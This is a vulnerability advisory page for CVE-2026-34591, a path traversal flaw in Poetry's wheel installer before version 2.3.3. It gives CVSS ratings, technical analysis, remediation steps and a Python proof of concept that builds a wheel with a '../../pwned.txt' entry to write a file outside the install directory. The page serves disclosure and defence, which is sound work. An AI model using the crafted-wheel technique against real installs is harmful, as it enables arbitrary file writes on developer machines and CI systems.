Skip to main content

Red Hat CVE-2026-34591

HIGH
Path Traversal (CWE-22)
2026-04-01 https://github.com/python-poetry/poetry GHSA-2599-h6xx-hpxp
7.1
CVSS 4.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.1 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
SUSE
6.5 MEDIUM
AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
Red Hat
6.5 MEDIUM
qualitative

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
P
Scope
X

Lifecycle Timeline

3
Patch released
Apr 02, 2026 - 02:30 nvd
Patch available
Analysis Generated
Apr 01, 2026 - 23:16 vuln.today
CVE Published
Apr 01, 2026 - 22:17 nvd
HIGH 7.1

Blast Radius

ecosystem impact
† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth
  • 1 pypi packages depend on poetry (1 direct, 0 indirect)

Ecosystem-wide dependent count for version 1.4.0.

DescriptionGitHub Advisory

Summary

A crafted wheel can contain ../ paths that Poetry writes to disk without containment checks, allowing arbitrary file write with the privileges of the Poetry process.

Impact

Arbitrary file write (path traversal) from untrusted wheel content. Impacts users/CI/CD systems installing malicious or compromised packages.

Patches

Versions 2.3.3 and newer of Poetry resolve the target paths and ensure that they are inside the target directory. Otherwise, installation is aborted.

Details

Poetry’s wheel destination path is built by directly joining an untrusted wheel entry path:

src/poetry/installation/wheel_installer.py:47 src/poetry/installation/wheel_installer.py:59

The vulnerable sink is reachable in normal installation: src/poetry/installation/executor.py:607

No resolve() + is_relative_to() style guard is enforced before writing.

POC

from pathlib import Path
import tempfile, zipfile, sys
from installer import install
from installer.sources import WheelFile
from poetry.installation.wheel_installer import WheelDestination

root = Path(tempfile.mkdtemp(prefix="poetry-poc-"))
wheel = root / "evil-0.1-py3-none-any.whl"
base = root / "venv" / "lib" / "pythonX" / "site-packages"
for d in [base, root/"venv/scripts", root/"venv/headers", root/"venv/data"]:
    d.mkdir(parents=True, exist_ok=True)

files = {
    "evil/__init__.py": b"",
    "../../pwned.txt": b"owned\n",
    "evil-0.1.dist-info/WHEEL": b"Wheel-Version: 1.0\nRoot-Is-Purelib: true\nTag: py3-none-any\n",
    "evil-0.1.dist-info/METADATA": b"Metadata-Version: 2.1\nName: evil\nVersion: 0.1\n",
}
files["evil-0.1.dist-info/RECORD"] = ("\n".join([f"{k},," for k in files] + ["evil-0.1.dist-info/RECORD,,"])+"\n").encode()

with zipfile.ZipFile(wheel, "w") as z:
    for k,v in files.items(): z.writestr(k,v)

dest = WheelDestination(
    {"purelib":str(base),"platlib":str(base),"scripts":str(root/"venv/scripts"),"headers":str(root/"venv/headers"),"data":str(root/"venv/data")},
    interpreter=sys.executable, script_kind="posix"
)
with WheelFile.open(wheel) as src:
    install(src, dest, {"INSTALLER": b"PoC"})

out = (base / "../../pwned.txt").resolve()
print("outside write:", out.exists(), out)

AnalysisAI

Path traversal in Poetry's wheel installer (versions prior to 2.3.3) allows malicious Python packages to write arbitrary files outside the installation directory during package installation. Attackers can craft wheel files containing ../ directory traversal sequences that bypass containment checks, enabling file overwrite with Poetry process privileges. This directly threatens CI/CD pipelines and developer workstations installing untrusted packages from PyPI or private repositories. No active exploitation confirmed at time of analysis, but a functional proof-of-concept is publicly documented in the GitHub advisory.

Technical ContextAI

Poetry is a Python dependency management and packaging tool (pkg:pip/poetry) that installs packages from wheel files (.whl archives). The vulnerability stems from CWE-22 (Path Traversal) in the WheelDestination class within wheel_installer.py. When extracting wheel contents, Poetry directly joins untrusted file paths from the wheel's archive entries to the target installation directory without validating that the resulting path stays within intended boundaries. Specifically, lines 47 and 59 in wheel_installer.py construct destination paths by string concatenation rather than using path resolution and containment checks (resolve() + is_relative_to()). An attacker can include entries like ../../pwned.txt in a wheel's file list, causing Poetry to write files to parent directories or arbitrary filesystem locations. The vulnerable code path is triggered during normal package installation operations invoked through executor.py line 607, meaning any poetry install or poetry add command processing a malicious wheel is affected.

RemediationAI

Upgrade to Poetry version 2.3.3 or later immediately, which implements path resolution and containment validation to prevent directory traversal during wheel installation. Users can verify their Poetry version with poetry --version and upgrade via pip install --upgrade poetry or pipx upgrade poetry depending on installation method. For environments where immediate upgrades are impractical, implement strict package source controls: pin dependencies to known-good hashes using poetry lock, enable hash-checking in pyproject.toml, and restrict package installation to vetted internal repositories rather than public PyPI. Review the vendor advisory at https://github.com/python-poetry/poetry/security/advisories/GHSA-2599-h6xx-hpxp for additional context. Organizations should audit file integrity in environments where Poetry has installed packages since deployment, particularly in shared CI/CD runners or production systems, as malicious wheels could have written backdoors or exfiltrated credentials to attacker-controlled paths.

Vendor StatusVendor

SUSE

Severity: Medium
Product Status
openSUSE Leap 15.6 Fixed

Share

CVE-2026-34591 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy